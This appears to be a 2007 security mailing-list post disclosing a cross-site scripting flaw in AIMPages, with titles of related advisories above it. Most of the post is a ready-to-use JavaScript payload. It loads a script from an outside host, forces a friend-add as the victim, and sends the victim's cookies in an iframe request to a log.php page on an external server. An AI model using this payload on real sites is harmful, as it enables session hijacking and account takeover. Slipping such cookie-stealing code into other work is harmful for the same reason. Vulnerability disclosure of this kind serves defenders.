Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Ovidentia 5.6x Series Remote File İnclude

PHP-Nuke <= 7.9 Old-Articles Block "cat" SQL Injection vulnerability

From:	Maximize Designs <emeckz_(at)_gmail.com>
Date:	15.01.2007
Subject:	AIMPages XSS

details @ http://skywarp.visfx.net/~amitcn/aimpages.js

listed below:

//
//author: amitmx, found: a long time ago
//
//<script src="http://amit.cn/aimpages.js"></script>
//
//aimpages.com does not filter anything
//

//showthemjsworks

alert('Welcome to Amit');
document.title='I stole your internets';

//forceadd

basicinfo.addMe('amit','basic-info-0');

//stealcookies

document.getElementById('buffer').innerHTML = '<iframe
src="http://skywarp.visfx.net/~amitcn/log.php?c=' + (document.cookie)
+ '"></iframe>';